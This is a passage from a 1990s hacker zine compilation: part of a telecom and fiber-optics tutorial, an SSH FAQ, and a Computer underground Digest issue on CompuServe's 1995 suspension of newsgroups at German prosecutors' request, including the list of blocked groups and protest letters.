Mb/s | 1344 | LIGHTWAVE | 56 | LCIE | | DS3 | 44.736 Mb/s | 672 | T3 OR LT | 28 |DSX-3/LCIE| | DS2 | 6.312 Mb/s | 96 | T2 | 4 | DSX-2 | | DS1C | 3.152 Mb/s | 48 | T1C | 2 | DSX-1C | | DS1 | 1.544 Mb/s | 24 | T1 | 1 | DSX-1 | | DS0 | 64 Kb/s | 1 | -- | -- | | |____________________________________________________________________________| | SUB RATES - DATA ONLY | |____________________________________________________________________________| | | 56 Kb/s | | | | | | | 9.6 Kb/s | | | | | | | 4.8 Kb/s | | | | | | | 2.4 Kb/s | | | | | |____________________________________________________________________________| LCIE = Lightguide Interconnect Equipment > The baisc unit of the hierarchy is the DS1 signal - which is a 24 channel, TDM, 1.544 Mb/s signal. > The number of voice channels carried of the other digital signal levsls are direct multiples of the basic DS1 signal. ------------------------------------------------------------------------------ EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF ------------------------------------------------------------------------------ * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #9 of 12 .... __ ...\ / |_ .../ \ e n o n | o u n d a t i o n .... .... presents: .... .... \ / ...*------ the \ / .... / \ files ------* .... / \ .. ... Fall/1993 Issue: 6 .. .. INTRODUCTION TO BASIC DIGITAL TECHNOLOGY ... Written by: Erik Turbo .... .... File: 6 of 6 .. .. 6. Multiplexing and Fiber Optics 6.1 Space Division Multiplexing (SDM) Space Division Multiplexing is the bunding of many physically seperate trans- mission paths into a common path. The channels are to be seperated in space. 6.2 Frequency Division Multiplexing (FDM) Frequency Division Multiplexing is the combination of many individual channels on a common facility. Each individual channel is placed on a common facility at a different "carrier frequency." The individual channels are said to be separated in frequency. 6.3 Digital Facility with Multiplexers ______ ___ ___ ______ <--->| | | | | | | |<---> <--->| CHAN |--->| | | |--->| CHAN |<---> <--->| | | | | | | |<---> | | | M | | M | | | <--->| BANK |<---| U | _________________ | U |<---| BANK |<---> <--->| | | X | | | | X | | |<---> <--->|______| | | | DIGITAL | | | |______|<---> .. | / |--->| TRANSMISSION |--->| / | .. | |<---| SYSTEM |<---| | ______ ______ | D | | | | D | | |<---> <--->| | | E | | | | E | | CHAN |<---> <--->| CHAN |--->| M | |_________________| | M |--->| |<---> <--->| | | U | | U | | | | | | X | | X | | | <--->| BANK |<---| | | |<---| BANK |<---> <--->| | | | | | | |<---> <--->|______| |___| |___| |______|<---> . ---> high speed ---> low speed . <--- low speed <--- high speed The function of a Multiplexer is to combine two or more lower rate bit streams into one high rate bit stream. At the other end of teh transmission system a Demultiplexer is needed to seperate the single high rate bit stream into two or more lower rate bit streams. Generally, multiplexers, or Muldems, are required whenever the digital transmission system operates at a rate other than DS1. 6.7 Fiber Optic Systems . ___________ ______________ _____________ . |Electrical | | | | | Input | to | | Transmission | | Optical to | Output -------> | Optical |---| Medium |---| Electrical |----------> . | Transducer| | | | Transducer | . |___________| |______________| |_____________| Basic Fiber Optic System Components A basic fiber optic system consists of an optical transmitter, a fiber optic channel, and an optical receiver. The input is usually DS1, DS1C, DS2, or DS3 electrical signals multiplexed in the optical transmission system. A transducer converts the electrical pulses into light pulses. The light sources include LASER, Light Amplification by Stimulated Emission of Radiation, and LEDS, Light Emitting Diodes. Most systems generate a signel frequency of light operating upwards in the 1500 nanometers range. The light source is turned on and off at a fixed pulse rate. The order of the "on" and "off" signals follow the bit pattern of the incoming electrical signals. The optical fiber are pure glass which provide a low loss transmission path for the lightwave signals. The optical fiber are pure glass which provide a low loss transmission path for the lightwave signals. Fiber systems used bny Telephone Companies are produced by NEC, Rockwell, AT&T, and Northern Telecom. 6.5 Fiber Typical Fibers The fiber consists of a core, cladding, and protective coating. > The core is made from germanium-doped silica glass and provides the medium for the digital optical signal. > The cladding which surrounds the core is also made of silica glass, but has different transmission characteristics that bend (refracts) the signal to stay within the core. Advantages of Lightguide 1. The large bandwidth allows much higher channel carrying capacities. 2. Less attenuation allows longer distances between regenerators, ranging from 35 to 50 miles. 3. The small size eases installation and allows mutliple use of conduit by using innerduct. ------------------------------------------------------------------------------ EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF ------------------------------------------------------------------------------ * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #10 of 12 .... Secure Shell FAQ .... Thomas Koenig Newsgroups: comp.security.unix,comp.security.misc Subject: SSH (Secure Shell) FAQ - Frequently Asked Questions Archive-name: computer-security/ssh-faq Url: http://www.uni-karlsruhe.de/~ig25/ssh-faq/ Posting-frequency: every 14 days -----BEGIN PGP SIGNED MESSAGE----- Ssh (Secure Shell) FAQ - Frequently asked questions by Thomas Koenig, Thomas.Koenig@ciw.uni-karlsruhe.de $Id: ssh-faq.sgml,v 1.16 1995/12/07 10:54:21 ig25 Exp $ This document is a list of Frequently Asked Questions (plus hopefully correct answers) about the Secure Shell, ssh. 1. Meta-questions 1.1. Where do I get this document? 1.2. Where do I send questions, corrections etc. about this document? 2. Ssh basics 2.1. What is ssh? 2.2. Why should I use it? 2.3. What kinds of attacks does ssh protect against? 2.4. What kind of attacks does ssh not protect against? 2.5. How does it work? 3. Obtaining and installing ssh 3.1. What is the latest version of ssh? 3.2. What systems does ssh run on? 3.3. May I legally run ssh? 3.4. Where can I obtain ssh? 3.5. How do I install it? 3.6. Where do I get help? 3.7. Are there any versions for other operating systems than UNIX? 4. Ssh Applications 4.1. Can I run backups over ssh? 4.2. Should I turn encryption off, for performance reasons? 4.3. Can I use ssh to communicate across a firewall? 4.4. Can I distribute files with ssh, as with rdist? 4.5. Can I use ssh to securely connect two subnets across the Internet? 4.6. Can I use ssh to securely forward UDP-based services, such as NFS or NIS? 4.7. Can I forward SGI OpenGL connections over ssh? 5. Problems 5.1. ssh otherhost xclient & does not work! 5.2. Ssh fails with "Resource temporarily unavailable" for Solaris 2.4 5.3. X11 forwarding does not work for an SCO binary with the iBCS2 emulator under Linux. 5.4. Ssh is doing wrong things for multi-homed hosts! 5.5. Userid swapping is broken under AIX! 5.6. ssh-keygen dumps core on Alpha OSF! 5.7. ssh-keygen dumps core on Solaris or SunOS 5.8. On Linux, compilation aborts with some error message about libc.so.4 5.9. X authorization fails for HP-UX 9.05 6. Miscellaneous 6.1. Credits 1. Meta-questions 1.1. Where do I get this document? The latest version of this document is available from http://www.uni- karlsruhe.de/~ig25/ssh-faq/. It will also be posted, on a regular basis, to the Usenet newsgroups comp.security.misc, comp.security.unix, comp.answers and news.answers. The original SGML file is at http://www.uni-karlsruhe.de/~ig25/ssh- faq/ssh-faq.sgml. Also of interest is the ssh home page, at http://www.cs.hut.fi/ssh/. 1.2. Where do I send questions, corrections etc. about this document? Please send them to the maintainer, Thomas.Koenig@ciw.uni-karlsruhe.de 2. Ssh basics 2.1. What is ssh? To quote the README file: Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels. It is intended as a replacement for rlogin, rsh, and rcp. 2.2. Why should I use it? The traditional BSD 'r' - commmands (rsh, rlogin, rcp) are vulnerable to different kinds of attacks. Somebody who has root access to machines on the network, or physical access to the wire, can gain unauthorized access to systems in a variety of ways. It is also possible for such a person to log all the traffic to and from your system, including passwords (which ssh never sends in the clear). The X window system also has a number of severe vulnerabilities. With ssh, you can create secure remote X sessions which are transparent to the user. As a side effect, using remote X clients with ssh is more convenient for users. Users can continue to use old .rhosts and /etc/hosts.equiv files; changing over to ssh is mostly transparent for them. If a remote site does not support ssh, a fallback mechanism to rsh is included. 2.3. What kinds of attacks does ssh protect against? Ssh protects against: o IP spoofing, where a remote host sends out packets which pretend to come from another, trusted host. Ssh even protects against a spoofer on the local network, who can pretend he is your router to the outside. o IP source routing, where a host can pretend that an IP packet comes from another, trusted host. o DNS spoofing, where an attacker forges name server records o Interception of cleartext passwords and other data by intermediate hosts. o Manipulation of data by people in control of intermediate hosts o Attacks based on listening to X authentication data and spoofed connection to the X11 server. In other words, ssh never trusts the net; somebody hostile who has taken over the network can only force ssh to disconnect, but cannot decrypted or play back the traffic, or hijack the connection. The above only holds if you actually use encryption. Ssh does have an option to use encryption of type "none" this is only for debugging purposes, and should not be used. 2.4. What kind of attacks does ssh not protect against? Ssh will not help you with anything that compromises your host's security in some other way. Once an attacker has gained root access to a machine, he can then subvert ssh, too. If somebody malevolent has access to your home directory, then security is nonexistent. This is very much the case if your home directory is exported via NFS. 2.5. How does it work? For more extensive information, please refer to the README and RFC files in the ssh directory. The proposed RFC is also available as an Internet Draft, as draft-ylonen-ssh-protocol-00.txt. All communications are encrypted using IDEA or one of several other ciphers (three-key triple-DES, DES, RC4-128, TSS). Encryption keys are exchanged using RSA, and data used in the key exchange is destroyed every hour (keys are not saved anywhere). Every host has an RSA key which is used to authenticate the host. Encryption is used to protect against IP-spoofing; public key authentication is used to protect against DNS and routing spoofing. The RSA keys are also used to authenticate hosts. 3. Obtaining and installing ssh 3.1. What is the latest version of ssh? The latest officially released version is 1.2.0. The latest development version is 1.2.12. 3.2. What systems does ssh run on? Ssh currently runs on UNIX or related system. Ports have been successful to all "mainstream" systems. At present, there are no known working versions for other operating systems (but see below). 3.3. May I legally run ssh? Ssh is free software, and can be freely used by anyone for any purpose. However, in some countries, particularly France, Russia, Iraq, and Pakistan, it may be illegal to use any encryption at all without a special permit. If you are in the United States, you should be aware that, while ssh was written outside the United States using information publicly available everywhere, the US Government may consider it a criminal offence to export this software from the US once it has been imported, including putting it on a ftp site. Contact the Office of Defence Trade Controls if you need more information. The algorithms RSA and IDEA, which are used by ssh, are claimed as patented in different countries, including the US. Linking against the RSAREF2 library, which is possible, may or may not make it legal to use ssh for non-commercial purposes in the US. You may need to obtain licenses for commercial use of IDEA; ssh can be configured to work without it. Ssh works perfectly fine without IDEA, however. For more detail, refer to the file COPYING in the ssh source distribution. For information on software patents in general, see the Leauge for Programming Freedom's homepage at http://lpf.org/. 3.4. Where can I obtain ssh? The central site for distributing ssh is ftp://ftp.cs.hut.fi/pub/ssh/. Official releases are PGP-signed, with the key ID DCB9AE01 1995/04/24 Ssh distribution key Key fingerprint =3D C8 90 C8 5A 08 F0 F5 FD 61 AF E6 FF CF D4 29 D9 The latest development version is available from ftp://ftp.cs.hut.fi/pub/ssh/snapshots/. Ssh is also available via anonymous ftp from the following sites: Australia: .ftp://coombs.anu.edu.au/pub/security/tools Finland: .ftp://ftp.funet.fi/pub/unix/security/login/ssh Germany: .ftp://ftp.cert.dfn.de/pub/tools/net/ssh Hungary: .ftp://ftp.kfki.hu/pub/packages/security/ssh Ireland: .ftp://odyssey.ucc.ie/pub/ssh Poland: .ftp://ftp.agh.edu.pl/pub/security/ssh Portugal: .ftp://ftp.ci.uminho.pt/pub/security/ssh Russia: .ftp://ftp.kiae.su/unix/crypto Slovenia: .ftp://ftp.arnes.si/security/ssh United Kingdom: .ftp://ftp.exweb.com/pub/security/ssh United States: .ftp://ftp.net.ohio-state.edu/pub/security/ssh United States: .ftp://ftp.gw.com/pub/unix/ssh Some mirrors may not have the most recent snapshots available. 3.5. How do I install it? Get the file from a site near you, then unpack it with gzip -c -d ssh-1.2.12.tar.gz | tar xvf - then change into the directory ssh-1.2.12, read the file INSTALL, and follow the directions. 3.6. Where do I get help? First of all, read the documentation, this document :-) and the ssh home page, at http://www.cs.hut.fi/ssh/. If this doesn't help, you can send mail to the mailing list for ssh users at ssh@clinet.fi. To subscribe, send mail to majordomo@clinet.fi with the message subscribe ssh in the body of the message. Before subscribing, you might like to take a look at the archives of the mailing list, at http://www.cs.hut.fi/ssh/ssh-archive. 3.7. Are there any versions for other operating systems than UNIX? Heikki Suonsivu (hsu@clinet.fi) and Michael Henits (moi@dio.com) each offered a US$ 100 reward for the first stable, freely redistributable version for either Windows or MacOS. There is a preliminary version for Windows by Cedomir.Igaly@srce.hr, available from http://public.srce.hr/~cigaly/ssh/; you might want to test this. Bernt.Budde@udac.uu.se is working on a Mac port. A port to VMS, by Mark Martinec (Mark.Martinec@nsc.ijs.si), is being worked on. 4. Ssh Applications 4.1. Can I run backups over ssh? Yes. Since ssh is a drop-in replacement for rsh, backup scripts should continue to work. If you use rdist, see below. 4.2. Should I turn encryption off, for performance reasons? No; you should keep it turned on, for security reasons. Today's CPUs are fast enough that performance losses (if any) only are noticable for local Ethernet speeds, or faster. You might want to specify RC4 encryption instead of the default, IDEA, with -c rc4. At an actual measurement, this dropped sustainable transfer speed between a P90 and a 486/100 (not the fastest CPUs around) from 386 kb/s (for no encryption) to 318 kb/s. Across a heavily loaded Ethernet, rc4 encryption together with compression may actually be faster than using rcp. If you don't encrypt your sessions, you are vulnerable to all the attacks which are open on the "r" suite of utilities, and you might as well not use ssh. 4.3. Can I use ssh to communicate across a firewall? Yes; you can use TCP forwarding for that, by using its secure TCP forwarding features. 4.4. Can I distribute files with ssh, as with rdist? Stock rdist 6.1.0 does not work together with ssh, due to bugs in it. You can use the Linux version of rdist (which should compile on any system for which rdist also works), available from ftp://sunsite.unc.edu/pub/Linux/system/Network/file-transfer/ as rdist-6.1.0-linuxpl2.tar.gz. 4.5. Can I use ssh to securely connect two subnets across the Inter- net? This has been discussed on the ssh mailing list. A proposed solution was to run ppp with TCP forwarding; however, this has not been implemented yet. 4.6. Can I use ssh to securely forward UDP-based services, such as NFS or NIS? Forwarding UDP packets has been proposed, but has not been implemented. There are two problems with this: o Some UDP-based programs use the IP address of the incoming packet and the port it was sent from as a form of authorization. Forwarding such packets from local ports would tend to confuse these (badly written :-) programs. o UDP-based programs usually use a retransmit strategy if they do not receive an answer for a predetermined time. This leads to ineffiency if packets are forwarded across a reliable connection, such as TCP. Somebody would have to implement lossy UDP forwarding to avoid this. 4.7. Can I forward SGI OpenGL connections over ssh? It is not likely that this will be implemented. OpenGL uses a totally different protocol from X, and at least gld would have to be replaced. 5. Problems If you don't find your problem listed below, please submit a bug report to ssh-bugs@clinet.fi, giving full details of o Version number of ssh and (if different) sshd o What you expected ssh to do o What ssh did instead (including all error messages) o The system you use (for example, the output of uname -a), and the output of config.guess. o The compiler you used, plus any compilation flags o The output of ssh -v o The output of the sshd daemon when run in debug mode, as sshd -d 5.1. ssh otherhost xclient & does not work! No, it doesn't. Use "ssh -f otherhost xclient" instead, or "ssh -n otherhost xclient &" if you want a script to be compatible with rsh. 5.2. Ssh fails with "Resource temporarily unavailable" for Solaris 2.4 This is a kernel bug in Solaris. Get the patch 101945-32. 5.3. X11 forwarding does not work for an SCO binary with the iBCS2 emulator under Linux. You need to set the hostname to the fully qualified domain name for this to work. Some Linux distributions set the hostname to the first part of the FQDN only. 5.4. Ssh is doing wrong things for multi-homed hosts! Check whether gethostbyname() really returns the complete lists of possible IP addresses (you might, for example, have your system configured to search /etc/hosts first, which might contain only one of the IP addresses). 5.5. Userid swapping is broken under AIX! This is a bug in AIX 3.2.5, reported as APAR IX38941, and fixed by patches U435001, U427862, U426915, and a few others. Contact your IBM representative for details. 5.6. ssh-keygen dumps core on Alpha OSF! For Alpha OSF/1 1.3.2, this is due to a bug in the vendor-supplied compiler with maximum optimization. Turn off all optimization for ssh-keygen, or use gcc. 5.7. ssh-keygen dumps core on Solaris or SunOS This is a bug in gcc 2.7.0, which causes it to generated incorrect code without optimization. Supply the "-O" or "-O -g" options to gcc when compiling. Alternatively, upgrade to gcc 2.7.2. 5.8. On Linux, compilation aborts with some error message about libc.so.4 This is an incorrectly configured Linux system; do a "cd /usr/lib; ln -s libc.sa libg.sa" as root to remedy this. 5.9. X authorization fails for HP-UX 9.05 This one is known, but a fix is not available yet. If you can supply any additional data, please send it to ssh-bugs@clinet.fi. The symptoms, as known so far, are: When the target machine is running HP-UX 9.05, it is most likely that X authorization fails if the xauth list produces some lines of output like "this_host:1 this_host:2 this_host:4", with gaps in the lettering. X authorization keeps failing until a local display number is higher than the highest already present number. Removing all xauth data does not seem to help. 6. Miscellaneous 6.1. Credits Most of the credit, of course, goes to Tatu Ylonen for writing ssh and making it available to the public. I have also used parts of his text from the documentation accompanying the ssh source distribution. Thanks also for his corrections for this FAQ. Also of invaluable help were corrections and additions from members of the ssh mailing list, by Mark Martinec, Pedro Melo, Michael Soukas, Adrian Colley, and Kenneth J. Hendrickson. -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMMbl5/Bu+cbJcKCVAQHGegQAmwrCuVd44aVYiQZE9/R5NEMOwOZmPVsJ KVHMsF49tPcA70zl1+KkZji00LtSFQTi9Lw5ts8xMqEmrWtkA9YAVFM7i6FqKApr yzvFUljNvH7yJFa152f0TXO78fA/yd5EFrNSjDY6gsmf6Nitg488p5fZGyH+X/3U wbzx2fswdoc=3D =3DszVP -----END PGP SIGNATURE----- -- Thomas K=F6nig, Thomas.Koenig@ciw.uni-karlsruhe.de, ig25@dkauni2.bitnet. The joy of engineering is to find a straight line on a double logarithmic diagram. * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #11 of 12 Computer underground Digest Wed Jan 3, 1996 Volume 7 : Issue 01 ... ISSN 1004-042X Editors: Jim Thomas and Gordon Meyer (TK0JUT2@MVS.CSO.NIU.EDU Archivist: Brendan Kehoe Shadow Master: Stanton McCandlish Field Agent Extraordinaire: David Smith Shadow-Archivists: Dan Carosone / Paul Southworth ... Ralph Sims / Jyrki Kuoppala ... Ian Dickinson Cu Digest Homepage: http://www.soci.niu.edu/~cudigest CONTENTS, #8.01 (Wed, Jan 3, 1996) File 1--REMINDER - CuD is Changing Servers - RESUBS ARE NECESSARY File 2-- The CI$ press release File 3-- List of CIS banned newsgroups File 4--Compuserve: Adam Dershowitz on Censorship File 5--Compuserve: Brad Templeton on ClariNet censorship File 6--WP: Germany Pulls the Shade On CompuServe, Internet File 7--Fwd: ALERT: Password Security File 8--Reuters: Telecom Bill Nixed Until Budget Fixed File 9--(fwd) Postcard to Briberspace (fwd) File 10--Cu Digest Header Info (unchanged since 16 Dec, 1995) CuD ADMINISTRATIVE, EDITORIAL, AND SUBSCRIPTION INFORMATION APPEARS IN THE CONCLUDING FILE AT THE END OF EACH ISSUE. --------------------------------------------------------------------- Date: Sun, 16 Dec, 1995 16:19:32 CST From: CuD Moderators Subject: File 1--REMINDER - CuD is Changing Servers - RESUBS ARE NECESSARY . *** CuD IS CHANGING SERVERS *** RE-SUB NOW In about mid-January, Cu Digest will be moving to a new server at weber.ucsd.edu. We're following the strong consensus of readers and requiring that, to continue to receive CuD after mid-January, you must RE-SUBSCRIBE. Although the move will not take place for a few weeks, you can enter your subscribtion before then, so WE STRONGLY URGE YOU TO SUB NOW. Re-subbing is easy. Just send a message with this in the "Subject:" line . SUBSCRIBE CU-DIGEST send it to: cu-digest-request@weber.ucsd.edu Issues will still be sent out from the older server for a few weeks, so the strategy is to collect the resubs first, and then make the transition. If you prefer to access CuD from Usenet, use comp.society.cu-digest If you prefer archives, you can use the ftp/www site at ftp.eff.org (or www.eff.org) or the CuD archives at: http://www.soci.niu.edu/~cudigest. We also hope to have a mail archive set up soon as well. You can still contact the moderators at: .cudigest@sun.soci.niu.edu or tk0jut2@mvs.cso.niu.edu Please *DO NOT* send inquiries to the server at UIUC. Jim and Gordon ------------------------------ Date: Sat, 30 Dec 1995 09:58:30 -0600 From: Stephen Smith Subject: File 2-- The CI$ press release FOR IMMEDIATE RELEASE CONTACT: William Giles Russ Robinson CompuServe Incorporated CompuServe Incorporated . 614/ 538-4388 614/ 538-4274 COMPUSERVE(R) SUSPENDS ACCESS TO SPECIFIC INTERNET NEWSGROUPS COLUMBUS, Ohio, Dec. 28, 1995 -- During the past week, CompuServe Incorporated temporarily suspended access to more than 200 Internet newsgroups in response to a direct mandate from the prosecutor s office in Germany. Each of the newsgroups that was suspended was specifically identified to CompuServe by the German authorities as illegal under German criminal law. CompuServe did not select any groups or determine the nature of the newsgroups that have been impacted by this action. .German government officials, as part of an investigation of illegal material on the Internet, ordered CompuServe to do what was necessary with respect to specified newsgroups in order to comply with German law. German authorities are investigating newsgroups and other Internet content that may contain child pornography, other pornographic material illegal for adults, as well as content that although not illegal for adults is of such an explicit nature that it is illegal for minors. .While access has been suspended, CompuServe continues to work with German authorities to resolve this matter. CompuServe cannot alter the content on the Internet in any way and has only suspended access to the disputed newsgroups through CIS. The issues being investigated in Germany, like those being addressed across the industry, need to remain focused on the individuals and groups placing content on the Internet. CompuServe, as an access provider, is not responsible for the origination or nature of content on the Internet over which it has no creative or editorial control. .The global market is vital to CompuServe. We currently have 500,000 members in Western Europe and anticipate doubling that number in the next year. As the leading global service, CompuServe must comply with the laws of the many countries in which we operate. However, laws in different countries are often in conflict, and this creates new challenges unique to the emerging online industry. CompuServe is investigating ways in which we can restrict user access to selected newsgroups by geographical location. ------------------------------ Date: Sat, 30 Dec 1995 10:04:16 -0600 From: Stephen Smith Subject: File 3-- List of CIS banned newsgroups I must admit that I am not familiar with _all_ of these newsgroups, but this is reported to be an accurate list of the groups blocked by CompuServe at the request of the Bavarian prosecutors. ---------- Forwarded message ---------- alt.binaries.pictures.erotica.teen alt.binaries.erotic.senior-citizens alt.binaries.multimedia.erotica alt.binaries.pictures.black.erotic.females alt.binaries.pictures.erotic.anime alt.binaries.pictures.erotic.centerfolds alt.binaries.pictures.erotic.senior-citizens alt.binaries.pictures.erotica alt.binaries.pictures.erotica.amateur.d alt.binaries.pictures.erotica.amateur.female alt.binaries.pictures.erotica.amateur.male alt.binaries.pictures.erotica.animals alt.binaries.pictures.erotica.anime alt.binaries.pictures.erotica.art.pin-up alt.binaries.pictures.erotica.balls alt.binaries.pictures.erotica.bears alt.binaries.pictures.erotica.bestiality alt.binaries.pictures.erotica.black.females alt.binaries.pictures.erotica.black.male alt.binaries.pictures.erotica.blondes alt.binaries.pictures.erotica.bondage alt.binaries.pictures.erotica.breasts alt.binaries.pictures.erotica.butts alt.binaries.pictures.erotica.cartoons alt.binaries.pictures.erotica.cheerleaders alt.binaries.pictures.erotica.d alt.binaries.pictures.erotica.disney alt.binaries.pictures.erotica.female alt.binaries.pictures.erotica.female.anal alt.binaries.pictures.erotica.fetish alt.binaries.pictures.erotica.fetish.feet alt.binaries.pictures.erotica.fetish.hair alt.binaries.pictures.erotica.fetish.latex alt.binaries.pictures.erotica.fetish.leather alt.binaries.pictures.erotica.furry alt.binaries.pictures.erotica.gaymen alt.binaries.pictures.erotica.latina alt.binaries.pictures.erotica.male alt.binaries.pictures.erotica.male.anal alt.binaries.pictures.erotica.midgets alt.binaries.pictures.erotica.oral alt.binaries.pictures.erotica.orientals alt.binaries.pictures.erotica.plushies alt.binaries.pictures.erotica.pornstar alt.binaries.pictures.erotica.pornstars alt.binaries.pictures.erotica.pre-teen alt.binaries.pictures.erotica.pregnant alt.binaries.pictures.erotica.redheads alt.binaries.pictures.erotica.spanking alt.binaries.pictures.erotica.tasteless alt.binaries.pictures.erotica.teen alt.binaries.pictures.erotica.teen.d alt.binaries.pictures.erotica.teen.female alt.binaries.pictures.erotica.teen.fuckTeens alt.binaries.pictures.erotica.teen.maleTeens alt.binaries.pictures.erotica.terry.agar alt.binaries.pictures.erotica.transvestites alt.binaries.pictures.erotica.uncut alt.binaries.pictures.erotica.urine alt.binaries.pictures.erotica.voyeurism alt.binaries.pictures.erotica.young alt.binaries.pictures.groupsex alt.binaries.pictures.lesbians alt.binaries.pictures.lolita.misc alt.binaries.pictures.nude.celebrities alt.binaries.sounds.erotica alt.homosexual alt.magick.sex alt.magick.sex.angst alt.motss.bisexua-l alt.politics.sex alt.recovery.addiction.sexual alt.recovery.sexual-addiction alt.religion.sexuality alt.sex alt.sex.aliens alt.sex.anal alt.sex.animals alt.sex.asphyx alt.sex.balls alt.sex.bears alt.sex.bestiality alt.sex.bestiality.barney alt.sex.bestiality.hamster.duct-tape alt.sex.bondage alt.sex.bondage.furtoonia alt.sex.bondage.sco.unix alt.sex.boredom alt.sex.boys alt.sex.breast alt.sex.brothels alt.sex.carasso alt.sex.children alt.sex.cthulhu alt.sex.disney alt.sex.doom.with-sound alt.sex.dylan alt.sex.enemas alt.sex.erotica.market.place alt.sex.erotica.marketplace alt.sex.escorts.ads alt.sex.escorts.ads.d alt.sex.exhibitionism alt.sex.extropians alt.sex.fat alt.sex.femdom alt.sex.fencing alt.sex.fetish.amputee alt.sex.fetish.diapers alt.sex.fetish.drew-barrymore alt.sex.fetish.fa alt.sex.fetish.fashion alt.sex.fetish.feet alt.sex.fetish.hair alt.sex.fetish.jello alt.sex.fetish.motorcycles alt.sex.fetish.orientals alt.sex.fetish.peterds.momma alt.sex.fetish.power-rangers.kimberly.tight-spandex alt.sex.fetish.robots alt.sex.fetish.scat alt.sex.fetish.size alt.sex.fetish.smoking alt.sex.fetish.sportswear alt.sex.fetish.startrek alt.sex.fetish.the-bob alt.sex.fetish.tickling alt.sex.fetish.tinygirls alt.sex.fetish.trent-reznor alt.sex.fetish.waifs alt.sex.fetish.watersports alt.sex.fetish.wet-and-messy alt.sex.fetish.white-mommas alt.sex.fetish.wrestling alt.sex.first-time alt.sex.fish alt.sex.furry alt.sex.gangbang alt.sex.girl.watchers alt.sex.girls alt.sex.guns alt.sex.hello-kitty alt.sex.historical alt.sex.homosexual alt.sex.incest alt.sex.intergen alt.sex.jesus alt.sex.jp alt.sex.magazines alt.sex.marsha-clark alt.sex.masturbation alt.sex.midgets alt.sex.modem-kamikaze alt.sex.motss alt.sex.movies alt.sex.necrophilia alt.sex.nudels.me.too alt.sex.oral alt.sex.orgy alt.sex.pedophilia alt.sex.pedophilia.boys alt.sex.pedophilia.girls alt.sex.pedophilia.pictures alt.sex.pedophilia.swaps alt.sex.pictures alt.sex.pictures.d alt.sex.pictures.female alt.sex.pictures.male alt.sex.plushies alt.sex.pre-teens alt.sex.prostitution alt.sex.reptiles alt.sex.safe alt.sex.services alt.sex.sgml alt.sex.sm.fig alt.sex.snakes alt.sex.sounds alt.sex.spanking alt.sex.stories alt.sex.stories.d alt.sex.stories.gay alt.sex.stories.hetero alt.sex.stories.moderated alt.sex.stories.tg alt.sex.strip-clubs alt.sex.super-size alt.sex.swingers alt.sex.tasteless alt.sex.telephone alt.sex.toons alt.sex.trans alt.sex.ugly alt.sex.uncut alt.sex.video-swap alt.sex.voxmeet alt.sex.voyeurism alt.sex.wanted alt.sex.wanted.escorts.ads alt.sex.watersports alt.sex.weight-gain alt.sex.wizards alt.sex.young alt.sex.zoophile alt.sexy.bald.captains alt.stories.erotic alt.support.disabled.sexuality alt.tv.tiny-toon.sex clari.news.crime.sex clari.news.gays clari.news.sex aus.sex de.talk.sex es.alt.sexo fido.ger.sex fido.sex-ger fido7.ru-sex fido7.ru-sex.adv fido7.russian-sex finet.sex fiod7.other.russian.sex fiod7.ru.sex gay-net.behinderte gay-net.btx-ecke gay-net.coming-out gay-net.dfue gay-net.erotic-stories gay-net.gruppen.general gay-net.guide.bundesweit gay-net.guide.weltweit gay-net.haushalt gay-net.international gay-net.kontakte gay-net.labern gay-net.lederecke gay-net.spiele gay-net.test rec.arts.erotica shamash.gayjews slo.sex soc.support.youth.gay-lesbian-bi t-netz.sex t-netz.sex-stories tw.bbs.sci.sex ucb.erotica.sensual uw.alt.sex.beastiality uw.alt.sex.bestiality uw.alt.sex.bondage uw.alt.sex.stories uw.alt.sex.stories.d zer.t-netz.sex ------------------------------ Date: Sun, 31 Dec 1995 01:36:22 -0500 (EST) From: "Declan B. McCullagh" Subject: File 4--Compuserve: Adam Dershowitz on Censorship ---------- Forwarded message begins here ---------- From--Adam Dershowitz Subject--Stop the Censorship! Date--30 Dec 1995 23:51:35 GMT Feel free to distribute or post the following letter where ever you see fit: Germany is setting the standards of free speech for the entire world, and Compuserve is going along. This is the first major case of censorship on the internet, and it is important that it is also the last. The eyes of every internet provider, of the US Congress and other governments are on this case to see how it develops. German prosecutors threatened Compuserve for allowing access to Usenet groups that they deemed to be unacceptable. Compuserve responded by censoring it's users over the whole world, by banning these newsgroups. If Germany tried to threaten a US phone company for allowing people to use dirty words on an international phone call the phone company would refuse to comply. Compuserve, given this same choice, chose to censor. They have chosen to take responsibility for the content of everything that crosses through their system, and to reject some of it. One way to prevent such things from happening again is to make sure that this censorship is not in the economic best interest of Compuserve, and Germany. If they want to interfere with First Amendment rights, then we should exercise our First Amendment rights to not communicate with them. A boycott can be a very effective tool, that can work even if you are not a Compuserve user. They have made a decision about community standards for the world, if you agree that they do not have that right, then do not accept their standards. If you are a Compuserve subscriber then cancel your account. Germany and Compuserve have chosen to selectively cut themselves off from the rest of the internet community, let's make it a complete separation. Do not send any E-mail to Compuserve or Germany. Do not reply to any newsgroup posts, and do not access any of their web pages. If you receive E-mail, then simply ignore it, send a copy of this letter, or your own explanation that you will no longer use a system that censors. If both Germany and Compuserve can be made into the pariahs of the internet world then perhaps others will get the message that censorship of the 'net is not acceptable and will only succeed in destroying the 'net. The World Wide Web should allow the exchange of any ideas around the world. It should not be limited to the minimum acceptable ideas that are allowed in any one of the countries or companies. If the information that is available on the 'net is allowed to be only that which is acceptable to people in Germany, Iran, Iraq, China and the US Congress, then the net will be useless. If any one government, company or entity, large or small, is allowed that much control of expression then the freedom on the internet is lost to everyone. Adam Dershowitz dersh@mit.edu 218 Thorndike St Apt 104 Cambridge MA 02141 ------------------------------ Date: Sat, 30 Dec 1995 23:33:34 -0800 (PST) From: Declan McCullagh Subject: File 5--Compuserve: Brad Templeton on ClariNet censorship >From Dave Farber's IP list. A good example of a sex panic on the part of Compuserve -- banning newsgroups they don't even provide... -Declan // declan@eff.org // My opinions are not in any way those of the EFF // ---------- Forwarded message ---------- To--Dave Farber Date--Sat, 30 Dec 1995 15:38:27 -0800 (PST) From--Brad Templeton Alas, we were also pretty shocked to see some ClariNet e.news newsgroups listed in the set that Compuserve announced it was banning from their servers in fear of German censorship laws -- but mostly because Compuserve isn't one 